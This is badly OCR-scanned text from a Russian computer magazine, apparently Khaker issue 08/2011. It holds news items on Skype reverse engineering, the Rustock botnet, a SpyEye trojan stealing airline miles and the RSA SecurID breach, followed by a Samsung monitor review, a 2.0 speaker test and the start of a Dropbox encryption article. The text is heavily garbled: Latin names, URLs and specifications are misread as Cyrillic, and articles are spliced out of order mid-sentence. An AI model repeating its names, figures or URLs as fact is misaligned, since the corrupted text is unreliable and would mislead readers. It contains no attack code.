[3Куре-ореп-зоугсе.6©д$ро{.согт} отреверсенный код скайпа (для 
версии 1.х/З.х/4.х], атакже раскрыл применяющийся в нем алгоритм 
шифрования данных (как выяснилось, используется надежное шиф- 
рование АЕБ и В5А с публичным ключом]. Помимо этого он опубли- 
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полосы будет выходить втечение месяца. В Мтсгозов искренне полагают, 
что создатели ботнета все же явятся в суд, чтобы отстоять свои интересы. 
Стой же целью был создан сайт понсео р{еадта$.согп, на котором пред- 
ставлены материалы по этому делу. Плюс на все почтовые и электронные 
адреса, которые использовались для создания иуправления ботнетом, 
были отправлены соответствующие уведомления. С одной стороны ясно, 
что к этому обязывает законодательство, но с другой, это все равно чер- 
товски трогательно и смешно :). Напомним, что компьютеры, входившие в 
сеть Ки${оск, втечение нескольких лет (с 2006 года] отправляли несколько 
миллиардов спам-сообщений в день. Чаще всего это были сообщения о 
лотереях и реклама медицинских препаратов. 


Гасебоок, похоже, достиг пика своего роста и начал сдавать назад. В США 
соцсеть потеряла около 6 млн пользователей (с 155,2 млн в начале мая — 


ковал исходный код клиента, который может отправить сообщение 
другим клиентам 5Куре, правда, для устаревшей версии протокола. 

В блоге он написал, что ищетединомышленников, которые рас- 
полагают достаточным запасом времени для того, чтобы завершить 
проект. Увы, впоследствии ссылки на файлы из блога были удалены, 
что вероятнее всего связано стем фактом, что несанкционированное 
использование кода сервиса приравнивается к нарушению прав 
Куре на интеллектуальную собственность. Тем не менее, в Сеть 
исследования хакера утекли, и их все еще можно обнаружить на 
крупных торрент-трекерах. 
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 МЕСАМЕМ/5_ 


ДЛЯ ТЕХ, КОГО ДОСТАЛО 30 


ао вора пов В а Веабосвь? 


Те ОР ра бог 30 ини... 


» 


МЕХЬЕВ ТАВ 9701 


Кажется, каждый производитель считает 


должным выпустить свой планештник, при- 
чем непременно наандроиде. Воти \\ежег 
объявила о релизе планшетного компьютера на 
базе Апаго!4 2.3 — М/ЕХЬЕК.ТАВ 9701. Специфи- 
кации довольно стандартные для такого рода 
устройств: 

® АКМ-процессор с частотой 1,2 ГГц; 

® 512 Мб ОЗУ; 

® 9, 7 ЗирегГЕТ-экран с разрешением 1024х768 
выполнен по технологии [Р$ и поддерживает 
мультитач; 

» ЗГбвнутренней флеш-памяти. 

Такого конфига, в частности, достаточно, чтобы 
воспроизводить видеоконтент 1080р (ЕиуЦНО). 


> 014 


Не знаю, возникала ли утебя, дорогой читатель, 
такая проблема, но иногда хочется сходить в 
кино на какой-либо фильм, а эту ленту везде по- 
казывают исключительно итолько в З0. Согла- 
сись, стереокартинка далеко не всегда бывает 
хороша [особенно натолком ненастроенной 
аппаратуре наших кинотеатров}, уместна, даи 
вообще, от3ЗО у многих устают глаза, болит голо- 
ва итворятся другие неприятные вещи. Также 
нельзя не заметить, что фильмы, снятые в 30, 
это одно, а фильмы в него конвертированные, 
— совсем другое. Ценность последнего весьма 
спорна. Однако обычный, не объемный формат 
— порой настоящая редкость. Те, коготакой 


Причем изображение можно даже вывести на 
внешние устройства отображения (ТВ, монитор, 
плазменная панель}, используется пи!-НОМ!- 
выход. Для удобства пользователей в планшете 
реализована функция подключения внешних 
05В-накопителей. Для выхода в Сеть исполь- 
зуются модули ПЕЕЕ 802.11 6/д/п] и ЗС (стан- 
дарта \Мдебапа Соде Омеюоп Мире Ассес°). 
Новинка оснащена датчиком положения в 
пространстве (б-сенсор] и СР5-приемником, 
поддерживающим функцию А-СРЬ5. Какза- 
являет производитель, литий-полимерногоак- 
кумулятора емкостью 7000 мАч хватит на более 
часов без подзарядки (в режиме использования 
сети интернет с включенным модулем \\/!-Е1. 


расклад не устраивает, придумали, как сделать 
очки, конвертирующие изображение обратно 
в20. Все предельно просто. Тебе понадобятся 
лишь две пары обыкновенных поляризацион- 
ных очков, каждая из которых стоит в районе $5 
или дешевле [а еще их часто раздают на халяву 
в кинотеатрах}. Какты помнишь, каждый глазв 
таких очках видиттолько свою картинку: левый 
— для левого глаза, правый — для правого. Весь 
фокус втом, чтобы путем нехитрых манипуля- 
ций, переставить линзы таким образом, чтобы 
водной паре очков оказались две левых линзы, 
ав другой две правых. И никакого больше3 0 и 
насилия над глазами! 


«Каждый четвертый американский хакер работает на ФБР», — заявляет 
Эрик Корли, который издает ежеквартальный журнал «2600». 


Планшет выполнен в стильном эргономичном 
корпусе толщиной от 12 мм, аего вес не превы- 
шает 700 г. Поставки начнутся в сентябре 2011 


года по ориентировочной розничной цене — 
13,900 рублей. 


Ожидается, что прибыли компании Кед На в этом году (по итогам года) 
достигнут рекордной отметки в $1 млрд. 


ДЕНЬГИ С 9В-КОДОМ 


Еще относительно недавно ОК-коды были 
забавой для гиков и энтузиастов, а широкие 
массы понятия не имели, что это такое. Но 

эти времена явно остались в прошлом, а эта 
новость — лишнее тому подтверждение. Коро- 
левский монетный двор Нидерландов выпустил 
первую в мире монету с ЧБ-кодом. Разумеется, 
монета коллекционная, не массовая, но все 

же. Выход необычного серебряного дензнака 
номиналом в евро приурочен к столетнему 


юбилею монетного двора в Утрехте. В след за 
этой монетой выйдети еще одна, уже золотая, 
номиналом в 10 евро. Всего их будетвыпущено 
2011 штук. Под ЧБ-кодом размещается ссылка 
на сайт Королевского монетного двора: м/ллм. 
959.п(. Кстати, интересно, возможно ли вообще 
отсканировать код смартфоном, ведь диаметр 
монеты составляет всего 33 мм, а код раз- 
мещается на площади меньше квадратного 
сантиметра. 
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РУЕУЕ ВОРУЕТ БОНУСНЫЕ МИЛИ 


Чего только в наши дни не крадут трояны — всевозможные пароли и 


г] “7 5ру Еуе.. 


Тиз Шег 


Яга аеааыу ри в стай, рой Ба 
в 
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логины, данные банковских карт, ключи от электронных кошельков и 
множество других приватных данных. Но недавно обнаружилось, что 


воруют теперь даже бонусные мили, начисляемые многими авиа- 


компаниями. Странность приметили 5есигКу-специалисты из фирмы 


Тги${еег: они обнаружили, что популярный вредонос 5руЕуе весьма 


успешно пытается «увести» данные с сайтов Аг ВегИипи АтР (цз. 


В случае АтР\45 все было довольно банально: загрузка страницы 


перехватывалась, на сайт добавлялась строка «номер банковской 


карты», и полученные таким образом данные переправлялись 


злоумышленникам. А вотсАш ВегИп вышло интереснее: малварь 


ориентировалась на сбор информации с аккаунтов, но целью атаки 


оказалась добыча миль налета постоянных клиентов. Каким образом 


хакеры собирались [или собираются] получить с этого деньги, пока не 


понимают даже в Тги$еег. 


августа, в Санкт-Петербурге. 


ДЕТЕКТОР ЛЖИ В БАНКОМАТЕ 


Первое апреля уже давно миновало, поэтому, 
признаемся — сходу воспринять эту новость 
серьезно унас не получилось. Стало известно, 
что российский Сбербанк занят разработкой 
итестированием нового вида банкоматов со 
встроенным полиграфом. В народе данный при- 
бор именуется детектором лжи. Ожидается, что 
такие машины будуториентированы на выдачу 
потребительских кредитов гражданам и смогут 
проверятьлюдей, ранее не обращавшихся в 
Сбербанк, по всей строгости. Банкоматоснастят 


устройством для сканирования паспортов, ска- 
нером отпечатков пальцев и всем необходимым 
для снятия биометрической картинки лица. 
Роль детектора лжи, в свою очередь, будет 
играть специальная технология голосового 
анализа, разработанная Центром Речевых 
Технологий (ЦРТ). Человеку, желающему по- 
лучить кредит, будут заданы вопросы вроде 
«работаете ли вы*» и «есть лиу вас другие 
непогашенные задолженности на данный 
момент?», а правдивость ответов тщательно 


Стали известны даты проведения «Спао$ Соп${гисНоп$ 2011». 11-И по 
счету фесттрадиционно состоится в последние выходные лета — 27 и28 


проанализирует упомянутая технология. Таким 
образом, решение по кредиту будет прини- 
маться на основании данных о нервозности и 
эмоциональном состоянии заявителя. А ведь 
даже гораздо более серьезные стехнической 
точки зрения полиграфы несовершенны, да 
и специалисты по фонетике считают подоб- 
ные методы шарлатанством... Тем не менее, 
Сбербанкуже планируетустановить новые 
банкоматы в торговых центрах и отделениях 
банка по всей стране. 


КЪА НАКОНЕЦ ПРИЗНАЛА КОМПРОМЕТАЦИЮ ФЕСИВВ 


КА Зесигиу заменит каждый из 40 миллионов токенов 5есиг!0, 
используемых сейчас, из-за атаки атаки хакеров, произошедшей в 
марте. Подразделение ЕМС наконец выпустило письмо для клиентов, 
в котором объясняет, что 5есиг|0 не удалось защитить корпорацию 

[ оскреед МагИп (производитель самолетов-истребителей Е-22 и 
Е-35), которую пытались взломать. 5есиг!0 — токен, который исполь- 
зуется при двухфакторной аутентификации. Каждый пользователь- 
ский аккаунт привязан ктокену, каждый токен генерирует псевдо- 
случайное число, которое меняется периодически, обычно каждые 
30 или 60 секунд. Для входа в компьютерную систему пользователю 
необходимо ввести не только имя и пароль, но и число, которое по- 
казываеттокен в текущий момент. Сервер аутентификации знает, 
какой токен какое число должен показывать в эту секунду, и таким 
образом может определить подлинность владельца имени и пароля. 
Нынешнее признание Б$А противоречит начальным заявлениям о 
том, что взлом не позволит выполнить «прямые атаки» на $есиг 0, 


паролей. 


полная замена всех токенов фактически означает признание того, 
что в настоящий момент они не обеспечиваюттой безопасности, 
которую клиенты предполагают. Источники внутри Б$А говорято 
том, что в результате мартовского взлома компания потеряла базу 
начальных значений, а алгоритм и так был известен ранее. Результат 
— токены 5есиг[0 не способны защитить от хакеров, по крайней мере 
оттех, которые осуществили взлом КЗА в марте. Для них 5есиг! не 
больше, чем несложное дополнение простой парольной аутентифи- 
кации, уязвимой ко всем кейлоггерам и повторному использованию 


Еще больше новостей на мм/м/.хакер.ги 
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Ш Александр Михеев 


28000 руб. 


будущего! 


Тестирование монитора затзипо зупсМа$ег 127А950 


ЖК-мониторы давно перестали быть чем-то необычным, 

а их огромных СКТ-предшественников редко встретишь у 
кого-нибудь в квартире (если только у трушных дизайнеров). 
Неудивительно, ведь покупка ЖК более не бьет по карману, как 
серп знаете по чему, и выбор практически неограничен — при- 
лавки прямо-таки ломятся от дьявольски схожих моделей. С 
одной стороны, это помогает не заморачиваться при подборе 
одной такой себе в пользование, с другой — нагоняет тоску, 
когда хочется, чтобы новый монитор отличался от старого хоть 
чем-то, кроме диагонали. 

Казалось бы, а что тут придумаешь? Воткнул кабель от ком- 
пьютера — увидел картинку. Надел очки — изображение стало 
объемным. Вот, можно сказать, и побаловался новой игрушкой, 
остается только ждать покупки следующей. Но процесс знаком- 
ства с только что распакованным монитором может радовать 

и занимать гораздо больше времени, если этот монитор — 
Затзипд ЗупсМаег 1274950. Впрочем, обо всем по порядку. 


Стильный гигант 


Из солидной прямоугольной подставки плавно «вырастает» 


тонкий корпус экрана. Тонкий, но очень большой — диаго- 
наль монитора составляет 27 дюймов. Трудно не заметить, что 
Затзипа 5упсМаег 127А950 сильно отличается внешним 
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видом от многих своих собратьев. Монитор производит впе- 
чатление устройства, попавшего к нам прямиком из будущего. 
Дизайн довольно строгий, нет лишних, отвлекающих деталей. 
Подставка устройства только с первого взгляда кажется просто 
подставкой. Во-первых, с тыльной стороны гнездится целая рос- 
сыпь всевозможных разъемов, подробнее о которых мы расска- 
жем чуть позже. Во-вторых, там прячутся «мозги» монитора. При 
включении даже можно услышать, как «просыпается» вентиля- 
тор в подставке. Благо, потом система охлаждения затихает. 


Из ряда вон 


При включении сразу бросилось В Глаза сомнительное решение 


производителей — глянцевая поверхность экрана. Это не так 
страшно на ноутбуке с диагональю дисплея 14 дюймов, но когда 
речь идето 27 дюймах, то в итоге мы получаем в буквальном 
смысле большое зеркало с завидной отражающей способностью. 
Хотя девочкам краситься будет удобно. Однако отражение и 


блики от дисплея компенсируются прекрасной цветопередачей 

и цветовым охватом. Сразу же стоит предупредить, что ты не 
найдешь здесь ни привычного 0\|-0, ни еще более знакомого 
О-5и6. Есть только НОМ, причем сразу два, поэтому ты сможешь 
подключить монитор одновременно к компьютеру и, например, 
ВО-плееру. Когда они оба не смогут развеять твою тоску, ты 
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Цветовой охват на зависть многим собратьям-мониторам 


можешь подключить к Затзипд ЗупсМа$ег 127А950 антен- 

ный кабель и посмотреть матч любимой команды, новости или 
музыкальный канал. Проверяя электронную почту, ты не пропу- 
стишь начало важной передачи, если воспользуешься функцией 
«картинка-в-картинке». 

На случай, если стандартный набор отечественных каналов тебя 
не прельщает, самым лучшим решением будет подключение 
цифрового ТВ с помощью имеющегося у 5атзипа 5упсМа$ег 
1274950 САМ-модуля. 


Мы все еще 
о мониторе? 


Все это очень хорошо, да только это совсем еще не все. Трудно 


говорим 


не заметить наличие популярного в последнее время среди 
мониторов разъема ЦЪВ 2.0. До тех пор, пока ты не подключил 
туда флешку или внешний жесткий диск, ты мог бы подумать, 
что это просто старый добрый хаб. Однако высветившее- 

ся меню развеет твои наивные предположения и предложит 
открыть носитель и воспроизвести с него аудио-, фото- или 
видеоконтент. Как видишь, встроенным ТВ-тюнером не обо- 
шлось, Затзипд ЗупсМа$%ег 12'7А950 также может справиться 
и с функциями медиаплеера. Но если это еще и медиаплеер, 
то поддержки только Ц$В 2.0 было бы недостаточно. Соединить 
«мониторо-ТВ-плеер» с твоей локальной сетью можно с помо- 
щью отдельного \\/1-Е!-адаптера, который (ты угадал! можно 
подключить в один из двух У$В-портов. Не забыт и старый 
добрый проводной способ передачи данных, ведь нет ничего 
проще — воткнул кабель в К.)-45 и смотри кино. И это действи- 
тельно просто, потому что Затзипа 5упсМа‹ег Т27А950 авто- 
матически настроит параметры сети и сможет воспроизводить 
контент из открытых сетевых папок. 

Не обошли этот монитор стороной и модные веянья в виде 
поддержки 30. Причем не обязательно искать трехмерный кон- 
тент, его можно получить из твоих собственных видео и фото 
благодаря возможности конвертирования изображения из 20 

в 30 на лету [вот, оказывается, зачем вентилятор в подставке]. 
Лицезреть же все это можно с помощью прилагающихся затвор- 
НЫХ ОЧКОВ. 


ХАКЕР 08 /151/ 2011 


249 


204 ‚7 

- 

| 

о 

1 138 

5 

Е 

Е 

| 

9 

ы 

о 

З ; 

ш 65 

О 70 139 209 255 


Взедите значение АСВ 


Герой сегодняшнего теста берет не только количеством 
функций, но и замечательным качеством цветопередачи 


Меню 5атзипа ЗупсМаег Т27А950 большое, цветное и доволь- 
но подробное. Это неудивительно, ведь нужно охватить столько 
поддерживаемых функций. Управлять им можно как с помощью 
сенсорных клавиш на передней панели экрана, так и с помо- 
щью пульта ДУ, который гораздо удобней в этом деле. Венчают 
список такие приятные мелочи, как автоматическая подстройка 
яркости и выключения подсветки или питания монитора, если 
его оставили в одиночестве. Это очень удобно, если ты тщатель- 
но бережешь электричество в доме. 


Методика тести рования 


Для определения цветопередачи монитора мы использовали 
колориметр Оа{асоог 5рудегЗЕЩе, с помощью которого произ- 
водился замер показателей цветопередачи в трех режимах: под 
нулевым углом, под углом 45 градусов и 60 градусов. Идеальной 
картиной считаются ровные, вытянутые в струну линии. 
Отклонение какой-либо из линий свидетельствует о нарушениях 
в цветопередаче. 

Также было интересно узнать и про цветовой охват устройства 
КСВ. Сложная треугольная разноцветная фигура является цве- 
товым охватом глаза человека. Зеленый треугольник — КСВ — 
цветовой охват, на отображение которого [в теории] рассчитано 
большинство мониторов. Красный треугольник — цветовой охват 
испытуемого монитора. Чем больше красный треугольник — тем 
лучше. 


Подводим итог 


батзипа 5упсМачег 12'7А9 50 — устройство, которое, безуслов- 
но, не будет обделено вниманием ввиду своего необычного 
дизайна и множества возможностей. Этот монитор прекрасно 
подойдет для создания в одной отдельно взятой комнате цело- 
го центра развлечений. С ним будет комфортно как работать и 
совершать какие-то повседневные задачи, так и отдыхать, что 
называется, от души. Вне зависимости от того, предпочитаешь 
ли ты фильмы высокого качества, цифровое ТВ, компьютерные 
игры, обработку фотографий или сериалы по обычным телеви- 
зионным каналам. = 
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Ш № Антон Николаев 


В ЗВУКАХ 


ВЫСОКИХ СФЕР 


Тестирование акустических систем формата 2.0 


© Прошли ужете времена, когда словосочетание «компьютерная 
акустика» вызывало ассоциации исключительно с убогими 
пластиковыми пищалками. Современные акустические наборы отлично 
решают самые частые задачи: прослушивание музыки, компьютерные 
игры ит.д. Про домашние кинотеарты не говорим — в сегодняшнем 
обзоре речь пойдет об акустике классического формата 2.0. 


Пробуем на вкус 

Спорить о вкусах — последнее дело. Дамы и не будем, в этом тестирова- 
нии перед нами стояла другая задача — определить, на чтота или иная 
акустика способна в принципе. Не нарушая сложившуюся традицию, 
встречаем участниковтеста «по одежке». 

Во-первых, габариты. Они имеютне последнее значение, ведь отних 
зависит, можно ли будет поставить купленные акустические системы 

на стол, безущерба занять половину рабочего пространства, или же 
придется долго стоять в комнате, соображая, куда же пристроить эти 
чертовы колонки. 

Во-вторых, дизайн. Дизайн, кстати, это нетолько, и даже не столько 
симпатичный внешний вид (договорились же о вкусах не спорить}, тут 
имеется в видутехническая сторона вопроса. Например, оттого, где и 
как на корпусах расположены регуляторы, будет в конечном счете зави- 
сеть удобство пользования. 

Ну и, конечно же, важен звук. Никаких поблажек для сегодняшних 
участников не планировалось, поэтому тестовый материал мы подоб- 
рали самый суровый, неоднократно проверенный втестах домашней и 
автомобильной техники, втом числе и класса МаП-епа. «Обязательную 
программу» составили диски, применяемые на автозвуковых соревно- 
ваниях, и один излучших, на наш взгляд, «домашних» тестовых дисков 
Госа! Тоо[$, безжалостно обнажающий все огрехи аппаратуры. 

Впрочем, мы были бы снобами, если бы этим дело и ограничилось, 
ведь в реальной-то жизни этой акустике предстоит играть музыку все 
же немного попроще. Поэтому в качестве «вольной программы» за- 
ранее была приготовлена целая стопка дисков, которые в ином случае 
вряд ли когда можно было бы увидеть воттак, вместе. В ней соседство- 
вали Агтит \/ап Виигеп со своими вертушками и плотным электронным 
ритмом и Рау Вгом/п со своим контрабасом [между прочим, нетакой 
простой для воспроизведения инструмент, для теста качества баса 
подходит очень даже неплохо), ДаскКу( со своими ядреными электро- 
гитарами (динамика и разборчивость средних частот] и О!апа КгаЦ со 
своим бархатным вокалом и шикарным аккомпанементом (проверка 
тонального баланса и качества воспроизведения средних и верхних 
частот). В общем, музыкальный материал на все случаи жизни. Чтоб уж 
без споров о вкусах. 
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Тестовый источник: 


Автомобильный [\О0-ресивер Арте О\А-9861К! 
+ переходник 2КСА1ю тт!-аск 


Тестовый материал: 


Госа!Тоо|$ 

|Д$СА ОМаа5оупа Оиау Каегепсе СО 
АМТЗ& 

Разножанровые сборники 


Списоктестируемого оборудования: 


Сгеа\\е Слдам/огК$ 140 зепез 1 
ЕЧНегС200 

ЕЧШНегК2000Т 

УВЕВчен! 

Мсгоа6 НП 

5меп 5Неат Меда 


Трудности выбора 


В плане уровня звука за свою стоимость акустическая система 
Мтсго[аб 500 15 удостаивается награды «Лучшая покупка». А вот по- 
мимо идеального звучания, да еще и удобства пользования в придачу 
вне всякой конкуренции — ЕЧШег С200. Блочная конструкция и «лен- 
тяйка» в комплекте открывают заманчивые возможности разместить 
акустику практически где душе угодно, не думая отом, придется ли 
тянуться или вскакивать с места, чтобы, например, прибавить или 
убавить громкость или переключить ее на другой источник. Одним 
словом, рекомендуем и награждаем акустическую систему призом 
«Выбор редакции». 
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СтеаНуе Саам/огк$ 
Т40 зепез 


Технические характеристики: 

ФОРМАТ: 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОЛЫ: АЦХ, разъем для док-станции Х-30 
ДОПОЛНИТЕЛЬНЫЕ ВЫХОДЫ: на наушники 

МОЩНОСТЬ: 2х16 ВтТКМ5 

ОТНОШЕНИЕ СИГНАЛИШУМ: 80 дБ 

БЛОК ПИТАНИЯ: внешний 

МАТЕРИАЛ КОРПУСОВ: пластик 

ГАБАРИТЫ: 325х180х90 мм 


ТУЗ им 


Стда\миогк$ [40 зепе5 | напоминают серьезные напольники, только в 
миниатюре. В каждой из колонокустановлены два среднечастотника и 
один твитер между ними. Такое расположение динамиков обеспечивает, 
по задумке производителя, их лучшее согласование. Среднечастотники 
имеютдиффузоры из плетеного стекловолокна. Этот материал, кстати, 
часто применяется в дорогой акустике. Дополнительная приятная фиш- 
ка — возможность подключения док-станции Сгеайуе Восктд ЗаНоп 
Х-30 для1Род, разъем для нее расположен натыльной стороне одной 

из колонок. Кстати, если утебя не |Ро4, а другой плеер, то ты можешь 
подключить его кАЦХ-входу, расположенному на лицевой стороне под 
регулятором громкости. 

Что касается звука, то глубокого баса и дискотечного ударного саунда от 
этой акустики можно не ждать, хотя на обычной музыке, включенной как 
ненавязчивый фон, особого дискомфорта нехватка баса не вызывает. 

А все благодаря тому, что средние частоты и верха звучат на редкость 
приятно для своей цены и размеров. Звук чистый и легкий. У этой акусти- 
ки неплохая разрешающая способность, которая наверняка позволит 
услышать даже в знакомых треках новые подробности. 


+ Ясное и красивое воспроизведение средних и высоких частот. 
+ Возможность подключения док-станции для1Ро4. 

+ Компактность. 

— Скромные басовые возможности. 
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Еатег с200 


Технические характеристики: 

ФОРМАТ. 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОДЫ: АЦХ 

ДОПОЛНИТЕЛЬНЫЕ ВЫХОЛЫ: нет 

МОЩНОСТЬ: 2х25 ВтВМ$ 

ОТНОШЕНИЕ СИГНАЛИ/ШУМ: 85 дБ 

БЛОК ПИТАНИЯ: встроенный 

МАТЕРИАЛ КОРПУСОВ: дерево 

ГАБАРИТЫ: 320х253х196 мм (АС), 223х218х72 [усилитель 


Если ты мечтаешь о стереосистеме, но бюджет не позволяет замахнуться 
на дорогую Н!-Н-«домашку», то обрати свое внимание на Еда ег С200. 
Во-первых, потому, что выглядит акустика великолепно и, безусловно, 
добавитярких нот в интерьер комнаты, куда будетустановлена. Во-вто- 
рых, ЕайегС200 имеет блочную конструкцию — пассивные акустичес- 
кие системы и отдельный усилитель судобным большим энкодером и 

[ ЕО-индикатором, на который выводится уровень громкости или уровень 
низких/высоких частот. В комплекте идет оченьудобный ПДУ карточного 
типа, так что управляться с этой акустикой — одно удовольствие. Помимо 
обычного стереовхода, усилитель оснащен дополнительным входом АЦХ, 
кнему можно подключить, к примеру, ОУ[-ресивер, медиаплеер или же 
игровую приставку, и потом переключаться между источниками прямос 
пульта. Как видишь, сточки зрения эргономики, функционала и внешнего 
вида ЕЯ \егС200 нет равных. 

С технической точки зрения все тоже сделано на высшем уровне. Корпуса 
колонок выполнены из МДФ и имеют качественное покрытие под черное 
дерево. Ободки вокруг динамиков — это не просто декор, а ихточеные 
фланцы, так чтотут все серьезно, никаких имитаций. 

Наконец звучит комплект очень интересно. Любители поддать баску на- 
верняка оценятнизкочастотный потенциал акустики, причем с помощью 
регулятора тембра звук можно настроить, исходя из собственных пред- 
почтений. С другими жанрами ЕЯ ег С200 (от дерзкого рока до мягкого, 
воздушного инструментала] справляется без проблем. В общем, в плане 
звука С200 можно назвать идеальным по «всеядности» комплектом. 


+ Качественный звук. 

+ Блочный дизайн, пульт дистанционного управления. 

— При полном отключении питания сбрасываются настройки 
громкости и тембра. 
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Еатег К2000Т 


Технические характеристики: 
ФОРМАТ: 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОДЫ: дублирующий 
ДОПОЛНИТЕЛЬНЫЕ ВЫХОДЫ: нет 
МОЩНОСТЬ: 2х30 ВтТКМ$ 

ОТНОШЕНИЕ СИГНАЛ/ШУМ: 95 дБ 

БЛОК ПИТАНИЯ: встроенный 

МАТЕРИАЛ КОРПУСОВ: дерево 

ГАБАРИТЫ: 320х253х196 мм 


УЗВ м 


Акустические системы К?2000Т хоть и не самые крупные в этом тесте, но 
имеют все же относительно приличные габариты, так что к выбору места 
для их установки нужно отнестись с должным вниманием. Лучше найти 
им место на столе, потому как регулятор громкости и регуляторы тембра 
расположены на боковой панели одной из колонок. Ручки утоплены в 
корпус, так что мешаться, в случае чего, не будут. Материал корпусов — 
толстый МДФ, исключающий вибрации стенок даже на приличной гром- 
кости. Это, кстати, довольно критично, потому как вибрирующие стенки 
— не что иное, как источник посторонних призвуков. Динамики в этой 
акустике применены точнотакие же, что и в С200. Диффузоры 6,5-дюй- 
мовых басовиков изготовлены из целлюлозы с защитной пропиткой, 
одного из признанных «аудиофильских» материалов. Излучающие 
мембраны твитеров тканевые. 

Звучание К2000Т абсолютно ненапряжное и подходит для любых ситу- 
аций и жанров, будь то фоновая легкая музыка, фильмы, игры или даже 
домашние вечеринки. Электронная музыка дается колонкам особенно 
хорошо. 


+ Качественные корпуса. 
+ Достойное звучание. 
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В Виа 


Технические характеристики: 
ФОРМАТ. 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОЛЫ: нет 
ДОПОЛНИТЕЛЬНЫЕ ВЫХОЛЫ: нет 
МОЩНОСТЬ: 2х10 ВтКМ5 

ОТНОШЕНИЕ СИГНАЛ/ШУМ: 70 дБ 

БЛОК ПИТАНИЯ: внешний 

МАТЕРИАЛ КОРПУСОВ: пластик 

ГАБАРИТЫ: 304х117х117 мм 


УК уу 


Главная фишка акустических систем от Нагтап/Кагдоп — необычный 
внешний вид. Дизайн этих серебристых «бомбочек» наверняка придется 
по душе любителям всяких штучек в стиле хай-тек. Под защитными 
сетками каждой колонки скрываются по одному совсем небольшому 
динамику (диаметром всего 4 см] с металлическими диффузорами сфе- 
рической формы. Они отвечают за воспроизведение всего частотного 
диапазона разом. Для того чтобы обеспечить адекватное звучание баса 
от столь малого излучателя, натыльную сторону корпусов выведены 
порты фазоинверторов с переменным сечением. В этой акустике они 
сделаны не просто «для галочки», а реально обеспечивают акустичес- 
кое усиление низких частот. Единственный регулятор, который есть на 
корпусе — это регулятор громкости. Не всякий найдетего сразу — роль 
«крутилки» выполняет верхний кругляш одной из колонок. 

Для своих размеров эта акустика неплохо басит, и при этом без какого- 
либо гудения на низких частотах. Звук, конечно, не как на мегаконцерте, 
но послушать электронную музыку или посмотреть киношку очень даже 
можно. Серединка и верха не самые натуральные, но, в общем, довольно 
ненапряжные, и при долгом прослушивании утомления не вызывают. 


+ Оригинальный внешний вид, компактность. 
— Нет регуляторов тембра. 


— Высоковата цена. 
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Мего|аЬ 500 15 


Технические ха рактеристики: 
ФОРМАТ: 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОДЫ: дублирующий 
ДОПОЛНИТЕЛЬНЫЕВЫХОЛЫ: нет 
МОЩНОСТЬ: 2х40 ВтКМ$ 

ОТНОШЕНИЕ СИГНАЛ/ШУМ: 80 дБ 

БЛОК ПИТАНИЯ: встроенный 

МАТЕРИАЛ КОРПУСОВ: дерево 

ГАБАРИТЫ: 315х238х168 мм 


Поставив эту акустику себе на стол, ты сможешь с гордостью показывать 
ее своим друзьям. Глянцевые поверхности передних панелей выгля- 

дят просто шикарно, аточеные фланцы твитеров смотрятся на них как 
никогда уместно. Никаких защитных грилей тут нет, но, тем не менее, 
динамики все же защищены: на 13-сантиметровых басовиках натянута 
полупрозрачная сетка, а механической защитой высокочастотника слу- 
жит небольшая декоративная дужка. Регулятор громкости расположен на 
боковой стенке, но ручка утоплена, так что мешаться не будет. Регулято- 
ры тембра убраны натыловую стенку корпуса: производитель, видимо, 
посчитал, что нечего их дергать постоянно — один раз отрегулировал и 
забыл. 

Звук этой акустики очень хорош: открытые и чистые средние и верхние 
частоты; упругий, сочный и вибрирующий бас, нетеряющийся на малой 
громкости и не уходящий в перегруз на большой; неплохая детальность, 
позволяющая без напряжения слышатьтонкие нюансы знакомыхтреков. 
Самое ценное, что звучание 5010 15 не утомляет даже при длительном 
прослушивании. Акустика легко отыгрываетлюбые жанры отударного 
клуба до агрессивного рока или легкого инструментала, причем на любой 
громкости. 


+ качественный звук, симпатичный внешний вид 
— на глянцевой поверхности могут оставаться отпечатки пальцев 
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5уеп Знеат 
Меда 


Технические ха рактеристики: 
ФОРМАТ: 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОДЫ: дублирующий вход 
ДОПОЛНИТЕЛЬНЫЕ ВЫХОДЫ: на наушники 
МОЩНОСТЬ: 2х60 ВтКМ5 

ОТНОШЕНИЕ СИГНАЛИШУМ: н/д 

БЛОК ПИТАНИЯ: встроенный 

МАТЕРИАЛ КОРПУСОВ: дерево 

ГАБАРИТЫ: 360х255х255 мм 


УТУ м 


Эти акустические системы по своим размерам ближе к классическим «по- 
лочникам» домашнего Н-Н, чем к компьютерным «настольникам». И тем 
не менее, производитель явно позиционирует их для установки именно 
на стол — регуляторы громкости и тембра и разъем тт-аск-выхода на 
наушники расположены на лицевой панели. Корпуса выполнены из МДФ, 
покрытие под благородный темный шпон придает им солидности и еще 
больше роднит с дорогой домашней техникой. Под съемными защитными 
грилями открываются полноценные 6,5-дюймовые басовые динамики. Их 
диффузоры выполнены из целлюлозы с защитным покрытием. Знатоки 
особо ценят этот материал за отсутствие у него паразитных призвуков и, 
как следствие, возможность получить более правильное звучание. Твите- 
ры имеют мягкие тканевые мембраны. 

В плане звука Згеат Меда можно назвать универсальными. Серединка и 
верха воспроизводятся хоть и не на аудиофильском уровне, но довольно 
ровно и комфортно. Акустика не забирается глубоко вниз по частоте, но 
плотный ударный бас клубной музыки передает играючи (особенно, если 
поколдовать с эквалайзером программного плеера), и ктому же имеет не- 
дурной запас по громкости. Так что для любителей домашних вечеринок 
этот комплект — самое то. 


+ Солидный внешний вид. 
+ Приличный запас неискаженной громкости. 


— Габариты позволят поставить их далеко не накаждый стол. 
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ОТБОРНЫЕ ПРОДУКТЫ 
СО ВСЕГО МИРА" 


ТА$Н Мы знаем, где в мире найти самые лучшие продукты. 
Ц Вы знаете, что можете найти их рядом, под маркой ТАЗН 


РС_СОМЕ 


Степан «5{ер» Ильин (41мм ег. сот/{еран)] 


Шифрование 


для Огорбох 


горбох: синхронизаци 
айлов — просто, 


НО небезопасно 


© Пользователи Огорбох сохраняют миллион файлов каждые 5 
минут. Всего сервисом пользуются 25 миллионов человек. При этом 
создатели не гарантируют неприкосновенность твоих данных, а 
система аутентификации уже давала сбой. 


Предыстория 

Девятнадцатого июня Огорбох устроил своеобразный «день откры- 
тых дверей». В течение 4 часов кто угодно мог зайти в чужой аккаунт 
с помощью произвольного пароля. Создатели сервиса, возможно, 
